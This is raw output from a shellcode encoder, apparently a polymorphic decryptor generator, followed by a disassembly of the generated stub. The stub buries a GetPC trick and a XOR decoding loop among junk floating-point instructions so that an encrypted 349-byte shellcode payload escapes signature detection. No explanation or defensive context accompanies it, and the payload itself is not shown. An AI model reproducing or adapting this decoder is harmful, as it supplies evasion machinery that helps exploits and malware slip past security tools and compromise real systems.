[+] The decryptor body was generated! [+] Decryptor body size = 379 bytes [+] Shellcode size = 349 bytes [+] Decryptor + Shellcode size = 728 bytes [+] Magic byte is C0 [+] Crypto steping = 3 byte(s) [+] Pass steping = 1 byte(s) [+] Shellcode dumped to D:\asm\shell.txt.tapion_bin [+] Written 733 bytes [+] Shellcode header stored to D:\asm\shell.txt.tapion_bin.h 00401054 C7C3 B043F745 MOV EBX,45F743B0 0040105A 9B WAIT 0040105B DBE3 FINIT 0040105D D9F0 F2XM1 0040105F FD STD 00401060 D9E5 FXAM 00401062 0FCB BSWAP EBX 00401064 8BDB MOV EBX,EBX 00401066 D9F1 FYL2X 00401068 21C9 AND ECX,ECX 0040106A 81EB 45F743B0 SUB EBX,B043F745 00401070 81FF DAA12C42 CMP EDI,422CA1DA 00401076 FD STD 00401077 81F9 61CB8E16 CMP ECX,168ECB61 0040107D 81F8 18D6D62E CMP EAX,2ED6D618 00401083 C7C3 4E739F38 MOV EBX,389F734E 00401089 21FF AND EDI,EDI 0040108B 81EB 51739F38 SUB EBX,389F7351 00401091 8BC9 MOV ECX,ECX 00401093 D9FF FCOS 00401095 3BFA CMP EDI,EDX 00401097 DBE2 FCLEX 00401099 43 INC EBX 0040109A DBE2 FCLEX 0040109C F5 CMC 0040109D D9FC FRNDINT 0040109F F9 STC 004010A0 D9F0 F2XM1 004010A2 43 INC EBX 004010A3 43 INC EBX 004010A4 09D2 OR EDX,EDX 004010A6 66:C7C3 5E01 MOV BX,15E 004010AB D9FE FSIN 004010AD DEC9 FMULP ST(1),ST 004010AF DBE2 FCLEX 004010B1 4B DEC EBX 004010B2 EB 08 JMP SHORT testsh.004010BC 004010B4 F9 STC 004010B5 DBE2 FCLEX 004010B7 DDC1 FFREE ST(1) 004010B9 90 NOP 004010BA D9F9 FYL2XP1 004010BC D9F5 FPREM1 004010BE 09FF OR EDI,EDI 004010C0 C7C7 905FFFE7 MOV EDI,E7FF5F90 004010C6 D9FC FRNDINT 004010C8 85FF TEST EDI,EDI 004010CA 85C9 TEST ECX,ECX 004010CC F9 STC 004010CD 57 PUSH EDI 004010CE 77 03 JA SHORT testsh.004010D3 004010D0 FD STD 004010D1 F5 CMC 004010D2 F5 CMC 004010D3 81F8 A42DB618 CMP EAX,18B62DA4 004010D9 DEE1 FSUBRP ST(1),ST 004010DB 8D3C24 LEA EDI,DWORD PTR SS:[ESP] 004010DE FFD7 CALL EDI 004010E0 C7C0 1C4D5387 MOV EAX,87534D1C 004010E6 21FF AND EDI,EDI 004010E8 D9E8 FLD1 004010EA 8BD2 MOV EDX,EDX 004010EC 81C0 08F2C724 ADD EAX,24C7F208 004010F2 DEC9 FMULP ST(1),ST 004010F4 3BFB CMP EDI,EBX 004010F6 8BFF MOV EDI,EDI 004010F8 D9F6 FDECSTP 004010FA DBE2 FCLEX 004010FC 81C0 DCC0E453 ADD EAX,53E4C0DC 00401102 DDD9 FSTP ST(1) 00401104 85DB TEST EBX,EBX 00401106 DEE1 FSUBRP ST(1),ST 00401108 DDE9 FUCOMP ST(1) 0040110A F9 STC 0040110B 03C7 ADD EAX,EDI 0040110D DBE2 FCLEX 0040110F D9FC FRNDINT 00401111 21FF AND EDI,EDI 00401113 D9F7 FINCSTP 00401115 DEF9 FDIVP ST(1),ST 00401117 C7C2 3F6634E6 MOV EDX,E634663F 0040111D 0FCA BSWAP EDX 0040111F 81EA 9832663F SUB EDX,3F663298 00401125 FF30 PUSH DWORD PTR DS:[EAX] 00401127 77 0B JA SHORT testsh.00401134 00401129 FD STD 0040112A D9E0 FCHS 0040112C 81FF 5FA53922 CMP EDI,2239A55F 00401132 D9F2 FPTAN 00401134 D9FF FCOS 00401136 D9E0 FCHS 00401138 59 POP ECX 00401139 FD STD 0040113A 8038 C0 CMP BYTE PTR DS:[EAX],0C0 0040113D D9F1 FYL2X 0040113F D9F9 FYL2XP1 00401141 DAE9 FUCOMPP 00401143 75 10 JNZ SHORT testsh.00401155 00401145 D8D1 FCOM ST(1) 00401147 57 PUSH EDI 00401148 DEE1 FSUBRP ST(1),ST 0040114A D9F3 FPATAN 0040114C DEF9 FDIVP ST(1),ST 0040114E 87C7 XCHG EDI,EAX 00401150 5F POP EDI 00401151 D8D1 FCOM ST(1) 00401153 D9E4 FTST 00401155 DEC9 FMULP ST(1),ST 00401157 D9E4 FTST 00401159 DDE1 FUCOM ST(1) 0040115B D9E5 FXAM 0040115D 81EA FCB20274 SUB EDX,7402B2FC 00401163 F9 STC 00401164 F5 CMC 00401165 DEF1 FDIVRP ST(1),ST 00401167 DEC1 FADDP ST(1),ST 00401169 81C2 FCB20274 ADD EDX,7402B2FC 0040116F 09C9 OR ECX,ECX 00401171 81FF 9749B351 CMP EDI,51B34997 00401177 4A DEC EDX 00401178 09C9 OR ECX,ECX 0040117A DBE2 FCLEX 0040117C 4A DEC EDX 0040117D F5 CMC 0040117E D9F9 FYL2XP1 00401180 FD STD 00401181 D9F6 FDECSTP 00401183 4A DEC EDX 00401184 DEF9 FDIVP ST(1),ST 00401186 21FF AND EDI,EDI 00401188 DEC9 FMULP ST(1),ST 0040118A F0:310C3A LOCK XOR DWORD PTR DS:[EDX+EDI],ECX ; LOCK prefix 0040118E 73 01 JNB SHORT testsh.00401191 00401190 FD STD 00401191 DBE2 FCLEX 00401193 DEF1 FDIVRP ST(1),ST 00401195 DAE9 FUCOMPP 00401197 09D2 OR EDX,EDX 00401199 21DB AND EBX,EBX 0040119B 4B DEC EBX 0040119C FC CLD 0040119D 4B DEC EBX 0040119E 73 0A JNB SHORT testsh.004011AA 004011A0 D9FE FSIN 004011A2 21C0 AND EAX,EAX 004011A4 D9FE FSIN 004011A6 3BCB CMP ECX,EBX 004011A8 85FF TEST EDI,EDI 004011AA 4B DEC EBX 004011AB F5 CMC 004011AC 81F9 EA9C405A CMP ECX,5A409CEA 004011B2 DEC9 FMULP ST(1),ST 004011B4 DDE9 FUCOMP ST(1) 004011B6 40 INC EAX 004011B7 7E 06 JLE SHORT testsh.004011BF 004011B9 D9E0 FCHS 004011BB DED9 FCOMPP 004011BD 21C0 AND EAX,EAX 004011BF DEF1 FDIVRP ST(1),ST 004011C1 09D2 OR EDX,EDX 004011C3 85DB TEST EBX,EBX 004011C5 D9FD FSCALE 004011C7 ^0F8F 58FFFFFF JG testsh.00401125 004011CD D9FE FSIN